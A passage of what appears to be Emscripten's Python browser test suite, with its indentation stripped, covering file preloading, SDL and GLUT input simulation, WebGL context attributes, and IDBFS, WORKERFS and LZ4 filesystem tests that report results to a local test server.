return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
      # test that a missing file runs xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
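# ASYNCIFY is needed here so that the blocking fsync() calls in the C test can wait for
# the asynchronous IndexedDB persistence done by FS.syncfs.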
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
# compress in emcc, -sLZ4 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
